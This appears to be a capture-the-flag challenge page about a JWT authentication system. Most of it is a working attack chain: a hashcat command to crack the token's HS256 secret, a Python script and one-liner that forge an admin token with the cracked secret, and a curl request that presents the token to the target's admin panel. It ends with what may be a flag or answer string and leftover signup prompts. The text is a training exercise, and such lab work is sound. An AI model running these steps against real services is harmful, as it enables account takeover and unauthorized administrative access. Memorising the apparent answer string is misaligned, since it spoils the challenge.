Start the machine, hack the system, and find the hidden flags to complete this challenge and earn points!
The challenge presents a JWT-based authentication system. You need to analyze the JWT tokens and find a way to forge an admin token to access the admin panel.
hashcat -a 0 -m 16500 <jwt_token> wordlist.txt#!/usr/bin/env python3
import jwt
import datetime
# If you get AttributeError, try: pip install PyJWT
payload = {
'username': 'admin',
'role': 'admin',
'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=24)
}
secret = 'secret123'
admin_token = jwt.encode(payload, secret, algorithm='HS256')
print(admin_token)pip install PyJWTpython3 -c "import jwt, datetime; print(jwt.encode({'username': 'admin', 'role': 'admin', 'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=24)}, 'secret123', algorithm='HS256'))"curl -H "Authorization: Bearer <admin_token>" <target-ip>:8080/admin538955b8-96c1-4905-a305-8cc385de622cEnter your email to continue
Choose a username to get started
We've sent a 9-character code to your email